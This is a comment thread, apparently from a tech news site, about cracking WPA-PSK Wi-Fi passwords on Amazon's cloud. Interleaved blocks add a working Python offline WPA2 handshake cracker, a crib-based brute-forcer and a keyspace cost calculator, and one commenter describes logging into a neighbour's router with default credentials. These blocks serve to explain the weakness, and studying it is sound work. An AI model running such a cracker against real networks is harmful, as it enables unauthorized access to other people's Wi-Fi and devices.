
The true cost please?
28 cents per minute times twenty minutes times how many nodes? I doubt it was just one. Please clarify.
A security researcher has tapped Amazon's cloud computing service to crack Wi-Fi passwords in a fraction of the time and for a fraction of the cost of using his own gear. Thomas Roth of Cologne, Germany told Reuters he used custom software running on Amazon's Elastic Compute Cloud service to break into a WPA-PSK protected …
Not worth a story in my opinion. It is well-known that one needs an effective keyspace of 2^80 or more (symmetric ciphers) today.
English prose is about 1 bit of real entropy per character. So if you want to perform
gpg --symmetric NaughtPic.png
you should enter something like "challeging wallabys deserves the utmost compassion of fiberglass inspectors and should never be done while eating lemons" for the password. I admit that my passwords are quite often three-word phrases. Please DO NOT use phrases out of books. The spooks do have access to lots of books in digitized form. Religious books are especially unfit for this purpose.
"Not worth a story in my opinion. It is well-known that one needs an effective keyspace of 2^80 or more (symmetric ciphers) today."
Among those in the know yes. But wider education is required.
The useful angle in this story is that it puts an easily understood metric on security: lucre.
Try giving your average Joe a simple explanation of how weak his wifi security is. Go on, try it. Not easy, is it? Then tell him that it costs less than a fiver to crack. That's a very powerful demonstration, and should get him to listen to your description of how to generate a good key.
Well, that answers my question about "why doesn't the router tell the intruder to F off after, say, 3 tries?".
Isn't it a huge hole to be able to take the encrypted password away? Why is that necessary? Why don't they just handshake in plain "English", and then the guest takes a guess at the password and the router says yay or nay, NOT "here's the answer, take that away with you to crack"?
What he's almost certainly done is recorded someone else having that very conversation with the router (not "plain english", but you get the point).
The inherent insecurity in all wireless tech is that you don't have point-to-point communication - if you say "hello", everyone who can pick up wireless transmissions can hear you. Breaking WPA just requires someone to listen for long enough to hear someone else run through the secure handshake and then take however long they want to break down and reverse the process offline.
It's like the door to a secret club; if you hear the pass-phrase clearly enough, you'll be able to con your way in.
As someone else said, though, if we're talking about home networks, I'm personally not bothered. Especially since I managed to connect to one of my neighbours' routers yesterday, which still has the default "admin"/"password" login.
I'd tell them, but they haven't been daft enough to use an SSID of their address (well, it's slightly worse since they haven't changed it at all), and there were no nodes connected at the time.
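The exchange the two posts above describe, as an added example that is not part of the original thread: the client proves it knows the passphrase by putting a MIC on handshake message 2, and that MIC, together with the SSID, both MAC addresses and both nonces (all sent in the clear), is enough for a listener to test guesses offline without ever talking to the router again. The code is standard-library Python following the 802.11i key schedule; the SSID, MACs, nonces and the 99-byte EAPOL body are constructed placeholders standing in for sniffed frames, and "correct horse" is an assumed passphrase.

```python
import hashlib
import hmac
from typing import Optional

# WPA2-PSK key schedule (IEEE 802.11i), standard library only.

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 iterations are the whole per-guess cost of a WPA-PSK attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf384(pmk: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-384: HMAC-SHA1 blocks over label || 0x00 || data || i, truncated to 48 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the two MAC addresses and two nonces; all four travel in the clear."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf384(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (CCMP) MIC: HMAC-SHA1 keyed with the KCK (PTK[0:16]) over the EAPOL frame
    with its MIC field zeroed, truncated to 16 bytes. WPA1/TKIP uses HMAC-MD5 instead."""
    return hmac.new(ptk[:16], eapol_frame, hashlib.sha1).digest()[:16]


# Constructed stand-in for a sniffed handshake. Real values come from the beacon
# (SSID), the frame headers (MACs) and EAPOL messages 1 and 2 (nonces, MIC).
SSID = "example-ssid"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = bytes(99)  # placeholder frame body, MIC field already zeroed


def simulate_capture(passphrase: str) -> bytes:
    """What a passive listener ends up with: the MIC the client put on message 2."""
    ptk = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, EAPOL_MSG2)


def crack_psk(captured_mic: bytes, candidates) -> Optional[str]:
    """Offline check: the router is never contacted, so it can never lock us out
    or count our attempts. Each candidate costs one 4096-round PBKDF2 plus a few HMACs."""
    for cand in candidates:
        ptk = derive_ptk(derive_pmk(cand, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk, EAPOL_MSG2), captured_mic):
            return cand
    return None


if __name__ == "__main__":
    mic = simulate_capture("correct horse")
    print(crack_psk(mic, ["password", "12345678", "correct horse"]))
```

Two things follow from the code: the per-guess work is fixed by the standard (PBKDF2 with 4096 rounds) and cannot be raised by the router, so the only lever the network owner has is the size of the passphrase space; and because the salt is the SSID, a precomputed table built for one SSID ("linksys", "SKY12345") is reusable against every network with that name.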
The real story is the availability to the citizen of what was once restricted to governments: computing power that can break 'approved' encryption. As always it is the end to end authentication and encryption that matters. More (better) coverage can be found here: http://www.technewsworld.com/story/Hacker-Shows-How-Cloud-Could-Wash-Out-Wireless-Security-71629.html
Just use good, long passwords and you're safe from this guy. A ten-character, random, mixed case alpha-numeric password will average 30000 years at 400000 per second. Realistically, passwords are often not random. Assuming four bits of entropy per character the time to brute-force a ten-character password comes down to a fortnight. If the 400000 figure is per node then it's a matter of how many nodes you buy and finding a ten-character password in less than a day is conceivable.
So, specify a sixteen-character password minimum to be safe. It's not like you have to type these in every day: they're typically entered into each computer once and saved. At that length it's getting hard to find dictionary words though I guess you'll still have idiots who manage to find a totally obvious pattern.
"It's not like you have to type these in every day"
I used the little button on my router the other day and didn't even have to type in the password. Granted, I've only used it once but if that is really compatible with a variety of devices one could max out the password field with completely incoherent and random gibberish and never even look at it again.
Maybe?
Remember that while this guy does it using EC2, Elcomsoft have already got the speed to 100k checks a second using GPU (HD5970 gets 103,000).
This means that a Sky Router supplied to Joe & Jane Bloggs with its 8-char (all UPPER) PSK will be at most 23 1/2 days to crack. It's a long time but 50% chance it'll be done in half this time so on average you'll get it in well under a fortnight!
These GFX cards are expensive now but will soon be commonplace, and once they're in all machines then the 5 machines I have in my house could get the password on average in just over 2 days!
So, while the cryptography isn't broken - the common implementation by major ISPs is....... wonder what the RIAA and MPAA will say?
>>"So, while the cryptography isn't broken - the common implementation by major ISPs is....... wonder what the RIAA and MPAA will say?"
Possibly they might find it appealing to say (in conjunction with the police) something like:
"You *appear* to have been illegally sharing copyright content. If your defence is an allegation that a computer crime has been committed and someone has been accessing your network without authorisation, as part of the investigation into that allegation, we require access to all your computers to check out your claim"
Personally, I suspect that they'd *love* someone to try the 'hacked wireless" excuse and then get done for falsely reporting a crime.
And as for the paranoid folks round here, having easy-to-break security on your network could rather leave you open to malicious individuals (or malicious agents of the state) downloading/uploading the kind of stuff that really *will* get the cops hammering on your door and poring over your hard drives.
If you actually have anything on your computer that you really don't want Big Brother to see, you probably want to make sure your wireless security is as good as it can be, or don't use wireless at all.
It's a chicken and egg problem. If you need to access a "cloud" service, like Amazon's, you need an Internet connection. And if you're trying to crack WPA encryption using said service, how are you to get online to do that? And if you already have a connection to the Internet then what is the point of cracking the WPA encryption? Perhaps in rare cases, someone trying to access an enterprise network could maliciously do this using a secondary connection to the Internet, but that's what RADIUS and WPA2-Enterprise with AES are for.
You need to let your imagination run a little. People often mistakenly assume their home network is safe, as long as they use WPA2 (that's for sophisticated users, who have actually heard of WPA2). Hence, resources like home computers, home network storage, etc. are often perilously insecure.
If someone wanted to plant something illegal onto your computer, or pilfer your documents, license keys, compromising private pictures or other valuable data, there would often be very little to stop them once they compromised your WiFi security. And the best thing - you would never know!
Never underestimate malice, jealousy or just plain envy when it comes to motivation.
Since you lack imagination:
Clod A gets himself a dial-up account for a month. He lives near Clod B who bought himself the spiffiest, fastest fiber connection available, and because he's the sort of Clod who is more interested in showing off his shiny new toys than understanding them, has his computers connected to them using WPA2 cause he heard that's the thing to use from a friend. Clod A collects his data sample and uploads it to the cloud to crack. Maybe he has to spend two whole months of dial-up connect time to use the Amazon cloud to break the encryption. But when he's done, he can now tap Clod B's super high speed connection for free and can cancel his dial-up service.
Your argument seems flawed, dear Watson.
Amazon rents its cloud oomph to clients independent of what they want to use it for. Sure, there may be some official policies against illegal stuff, but unless someone takes some serious time and effort to debug every single program executed on the cloud, there is no way for Amazon to know just what their fluffy stuff is being used for.
I reckon that Amazon might publish a policy update sometime soon.
Amazon is not a protected internet service provider that provides service to end-users.
ISPs like comcast, rr, time warner, att, all are exempt from things like this since it happens at the clients residence.
These actions however occur at Amazon facilities. Don't look for amazon to be held liable for it however.
Amazon owes a lot in taxes to various states but was recently told "don't worry about it" after they rm'd wikileaks.
If someone comes to our company to lease a dedicated server and something like this occurs we are liable for it. Us going after the client is our responsibility. We aren't providing end-user service and neither is amazon.
Unlike an end-user ISP amazons own employees could be doing it. You could never prove otherwise.
You can only crack something when you know the clear text. In WWII they knew some of the clear text e.g. Heil Hitler or the weather report. You can crack encryption on wireless by sending the guy an email and watching the encrypted version as he reads it. Since you already know the clear text you can brute force the key.
To crack the wikileaks insurance file you'd need to know what was in it. The boffins at Bletchley were German linguistics experts so looked for word patterns (or cribs) i.e. they guessed parts of the plaintext and just cranked the handle until they saw the words. You'd have to do the same for the wikileaks insurance file and since no-one knows what it is about it'd take a long time if all you had to go with was a guess of "US" as a single word.
Most computer-readable file formats have a sequence of ID bytes near the start of the file that the associated application uses to verify that the file is of the correct type. You just get a list of the ID strings used by all the likely file formats and use these as your cribs.
For plain ascii text just check for a long sequence of bytes which have the highest order bit set to zero, or check against a dictionary.
You can rely on entropy reduction in the output of your decryption to be informative as well. The cracking of the Enigma code resulted from knowing the coding mechanisms (it was after all patented) and knowing what letter combinations occur with which frequency in the plain text (assuming it was German). Knowing actual words is a great boon, but not strictly necessary.
If you really need provably uncrackable security on a document: use a properly randomized one-time-pad, i.e. an unguessable password of the same length as the plain text, and doing e.g. a bit-wise XOR. You cannot brute force this, because you need to generate all character sequences of the same length as the document, which leaves you to select which of the 27^N (assuming no caps, digits, or punctuation, with N the number of characters) outputs is the correct one. Apart from all nonsensical N character texts, only one of the sensible N character texts is the right one.
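The three replies above (format ID bytes as cribs, the high-bit check for ASCII, and entropy reduction) describe one recogniser for "did this key produce real plaintext?". Here is that recogniser as an added example, not code from the thread: a toy SHA-256 counter-mode stream cipher keyed from a 4-digit PIN stands in for any cipher with a small enough keyspace, and the scoring function ranks every candidate decryption by magic bytes first, printable ASCII second, and low byte entropy last. The PNG-like sample and the PIN "4271" are constructed for the demonstration.

```python
import hashlib
import math

# Toy stream cipher keyed from a 4-digit PIN, built from SHA-256 in counter mode.
# It stands in for any cipher whose key is small enough to enumerate; the point
# of the example is recognising the right decryption, not the cipher itself.

def keystream(pin: str, n: int) -> bytes:
    key = hashlib.sha256(pin.encode()).digest()
    blocks, counter = [], 0
    while 32 * len(blocks) < n:
        blocks.append(hashlib.sha256(key + counter.to_bytes(8, "big")).digest())
        counter += 1
    return b"".join(blocks)[:n]


def xor_crypt(pin: str, data: bytes) -> bytes:
    """Encrypt and decrypt are the same operation for a stream cipher."""
    ks = keystream(pin, len(data))
    return (int.from_bytes(data, "big") ^ int.from_bytes(ks, "big")).to_bytes(len(data), "big")


# ID bytes ("cribs") of common file formats. Longer cribs are stronger evidence,
# so a match scores its own length; a random 2-byte coincidence cannot outrank
# a real 8-byte PNG signature.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "PNG",
    b"%PDF-": "PDF",
    b"PK\x03\x04": "ZIP/OOXML/JAR",
    b"\x7fELF": "ELF",
    b"GIF8": "GIF",
    b"\xff\xd8\xff": "JPEG",
    b"\x1f\x8b": "gzip",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Wrong-key output looks random (near 8 for long samples); real files sit lower."""
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def ascii_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace (high bit never set)."""
    return sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13)) / len(data)


def score(candidate: bytes):
    """Higher means more plausible plaintext. Returns (score, reason)."""
    for magic, name in MAGIC.items():
        if candidate.startswith(magic):
            return float(len(magic)), name + " header"
    if ascii_ratio(candidate) > 0.95:
        return 2.0, "printable ASCII"
    h = shannon_entropy(candidate)
    return max(0.0, 1.0 - h / 8.0), f"entropy {h:.2f} bits/byte"


def brute_force(ciphertext: bytes, pins):
    """Try every PIN and keep the decryption that scores best. Returns (score, pin, reason)."""
    best = None
    for pin in pins:
        s, why = score(xor_crypt(pin, ciphertext))
        if best is None or s > best[0]:
            best = (s, pin, why)
    return best


# Constructed sample: a PNG signature and IHDR chunk header followed by low-entropy body bytes.
SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + bytes(240)
ALL_PINS = [f"{i:04d}" for i in range(10000)]

if __name__ == "__main__":
    ct = xor_crypt("4271", SAMPLE)
    print(brute_force(ct, ALL_PINS))
```

The ranking only needs the first few bytes of output, which is why a cracker can reject almost every wrong key after decrypting a single block; and it is also why the one-time pad in the post above defeats it: with a key as long as the message, every candidate "plaintext" is equally reachable, so a PNG header showing up proves nothing about the key.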
use the first word on each line of a random book page. How good is that?
4 bits per character is the size of a hexadecimal code - duh. one bit per character for plain text sounds about right.
What's the maximum key length anyway? Yes, it's stored in Windows and other OS so it usually doesn't need to be re-typed. You can even load it from a USB stick, I think. But you do have to type it a few times.
I am expecting to dispose of a computer shortly that has my network key, so I'll be changing it!
I read an interesting point at my (new) company the other day, as part of their security/password policy: write the password down.
Now yep that sounds TOTALLY WRONG, but their argument was that since most attacks will occur over a network, it's more secure to use a very long password written down, than a shorter one remembered.
I've yet to see any remote attack that can open the top drawer of my desk and read a post-it note.
"I've yet to see any remote attack that can open the top drawer of my desk and read a post-it note."
I've just seen the future and it has small, semi-autonomous, camera-equipped flying lockpicks in it.
Fortunately, just after I saw that I had an Anadin and a large Scotch and forgot about it all. Good thing for you I didn't write it down anywhere eh? Oh.....damn.....time paradox.........
Here: http://blog.zorinaq.com/?e=42
In the last section is a concrete example showing a typical Amazon EC2 GPU brute forcing task costing 33x more than building and running it on your own GPU machine.
The takeaway is that Amazon EC2 GPU instances are very costly for 'dumb' brute forcing jobs, and relatively slow because they are based on Nvidia Tesla M2050 cards which only offer 1/3rd to 1/4th the performance per Watt and per dollar of high-end AMD/ATI cards.
Using Amazon for any brute forcing job makes no financial sense unless operating at such a small scale that buying a single GPU would be more expensive (which seems to be what Roth is doing by spending only $1.68 on one crack).
That depends entirely on how much you want to crack. Buying even just one radeon hd 5970 at currently $ 532.95 (pricewatchdotcom) is well more expensive than shelling out a fiver or a tenner for an amazon job. Not counting buying the rest of the box and having it accessible where you want it, locally or remotely through say a DSL hookup ($N per month) or a colo ($M per month) plus power and maintenance and such. So if you need more than a little GPU power, get your own. If instead you just need twenty minutes on eight GPU instances, well.
While this was probably done mostly for show, the economics behind it aren't much different from the old "do we buy or rent a super for our research?" or even "do we buy or rent a car to get from here to there and back?" you find elsewhere.
(You mention power, cooling, hardware to support the GPU, but all of this is already taken into account in the "33x" number I mention above, see the link).
I recognize your point. You paraphrased my last sentence: EC2 only makes financial sense when operating at the hobbyist scale, on minuscule brute forcing tasks. I am just afraid this article conveys the wrong idea. Anybody spending more than a couple *dozen hours* on 8 EC2 GPU instances should realize that buying 2-3 GPUs would be faster and a lot less expensive beyond that point.
According to FBI Director Louis Freeh, speaking at the Senate Judiciary Committee's Terrorism, Technology & Government Information Subcommittee in 1997...
"As my friend in the NSA tells me, to break 120-bit encryption, it would take 26 trillion times the age of the universe to decipher one criminal bit or one message bit in order to respond and take some appropriate action. We can't function that way. "
Appears that the universe ended a bit early.
Or it takes Fort Meade 20 minutes to process the keys, and the rest of the time trying to do the paperwork authorising the inter-department recharge for the work?
The additional cost to brute force a password grows exponentially with increased characters.
Let's assume that there are at least 64 possible choices for each character in a password.
If it takes $1.68 and 28 min to crack a 6 character password a 10 character password will require 64^4 as much time and money. That works out to about $28 Million and 893 years.
Let's make the drastic assumption that cloud computing costs and times are cut in half every 18 months for the next 48 years. You will be able to brute force a 10 character password for $1.68 but it's still going to cost $28 million to brute force a 14 character password.
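The arithmetic in this post, the Sky-router post (8 uppercase characters at 103,000 guesses/s) and the earlier "ten characters at 400,000 per second" post are all the same calculation with different inputs, so here it is once as an added example, not from the thread: keyspace from alphabet size and length (or from assumed bits per character), worst-case and average time at a given rate, the observation that extra nodes shorten the wall clock but not the bill, and the post's halving-every-18-months extrapolation. The rates, prices and the 1.5-year halving period are the posts' own assumptions, not measured figures.

```python
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace_bits(charset_size: int, length: int) -> float:
    """Bits of a uniformly random password drawn from charset_size symbols.
    For human-chosen passwords substitute an entropy estimate (e.g. 4 bits/char * length)."""
    return length * math.log2(charset_size)


def crack_estimate(bits: float, rate_per_node: float, nodes: int = 1,
                   price_per_node_hour: float = 0.0) -> dict:
    """Worst case and average (half the keyspace) time and money for an exhaustive search."""
    worst_seconds = 2 ** bits / (rate_per_node * nodes)
    worst_hours = worst_seconds / 3600
    # Renting N nodes divides the time by N but multiplies the hourly bill by N:
    # cloud brute force gets faster with scale, never cheaper.
    worst_cost = worst_hours * nodes * price_per_node_hour
    return {
        "worst_days": worst_seconds / 86400,
        "avg_days": worst_seconds / 86400 / 2,
        "worst_years": worst_seconds / SECONDS_PER_YEAR,
        "avg_years": worst_seconds / SECONDS_PER_YEAR / 2,
        "worst_cost": worst_cost,
        "avg_cost": worst_cost / 2,
    }


def scale_observed(cost: float, minutes: float, charset_size: int,
                   observed_len: int, target_len: int) -> tuple:
    """Extrapolate one observed run to a longer password: every extra character
    multiplies both cost and time by charset_size."""
    factor = charset_size ** (target_len - observed_len)
    return cost * factor, minutes * factor


def cost_after_years(cost_now: float, years: float, halving_years: float = 1.5) -> float:
    """Cost if compute price halves every halving_years (the post's assumption)."""
    return cost_now / 2 ** (years / halving_years)


if __name__ == "__main__":
    # 8 uppercase letters at 103,000 guesses/s on one GPU (the Sky-router post)
    print(crack_estimate(keyspace_bits(26, 8), 103_000)["worst_days"])
    # $1.68 and 28 minutes for 6 characters from 64 symbols, scaled to 10 characters
    print(scale_observed(1.68, 28, 64, 6, 10))
    # 10 characters of 62-symbol alphanumerics at 400,000/s, and the same length at 4 bits/char
    print(crack_estimate(keyspace_bits(62, 10), 400_000)["avg_years"])
    print(crack_estimate(4 * 10, 400_000)["avg_days"])
```

Running it reproduces the numbers quoted in the thread: about 23.5 days for the 8-character uppercase PSK, $28 million and 893 years for the scaled 10-character case, roughly 33,000 years on average for a truly random 10-character alphanumeric password, and about a fortnight once the same length is assumed to carry only 4 bits per character. The 10-character case falls to $1.68 after 24 halvings (36 years at the post's rate), since 64^4 is exactly 2^24.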
My wi-fi is wide open. Anyone can access it.
Granted I have property out in the country. In order to get close enough to access my wi-fi, it is necessary to trespass on my property. Where I live here in the states, we shoot trespassers. Then we fire up the backhoe and put their permanent dirt-nap 6ft under.
It is no surprise I have never had a problem with someone stealing my Internet access.
I understand that from the 1st of Jan it became a criminal offense to download copyright material so I will use my WISP skills and a high gain antenna to use your Internet from 2 miles away. This will draw letters from Hollywood lawyers which your ISP will then forward to you. You may well get arrested and put in prison. You will be the first under this new law I expect.
If you encrypt your WiFi and I crack it you won't be able to deny it was you and blame me. At least if it's open there is a possibility that it was not you. I am basing this on a recent letter a customer received from their ISP who had been contacted by Hollywood lawyers for stealing a movie using BitTorrent.
>>"if you encrypt your WiFi and I crack it you won't be able to deny it was you and blame me."
I guess in the first place, that depends on whether it's provable how secure a network was at some time in the past.
Who can contradict a claim it may have been unsecured, or using WEP or a short key, unless they've been staking the network out?
Secondly, at least at the moment, it seems more likely that people would crack passwords for networks they were hoping to use repeatedly.
However, that'd be a pretty dangerous thing to do, since unless the first a network owner knows is a high profile police raid that an unauthorised accesser is likely to see, the network owner may well be aware of unauthorised access long before the unauthorised accesser knows they've been rumbled, leaving the potential open for them being tracked down and given a severe legal kicking.
That would probably only need to happen a few times to make most people think twice.
If someone created a /smart/ three strikes system, with helpful initial warning letters and support for customers who made a criminal complaint alleging their network was being broken into, it could be an extremely unpleasant place for people trying to get unauthorised access.
If someone was making *regular* use of a network, it'd be easy to fairly solidly confirm suspicions of hacking by having an investigator quietly on the premises at the appropriate time (or by having the owner confirmed to be away from home) assuring themselves that the owner wasn't making any wireless connections of their own whilst the hardware was recording wireless connections being made.
63 characters. That's what mine is; plus it's a random stream of characters. Damn, I just reduced the keyspace for your attack.
Sure, it's a 5 minute job to type into boxes (such as games consoles) where you can't use XP's Wireless Network Setup Wizard, or a text file on a USB stick to copy it across, but hey, you get that fuzzy feeling and it saves a thirty foot length of Cat5 running to the router.
And Xbox is WPA only... no WPA2 -- boo to you, Microsoft!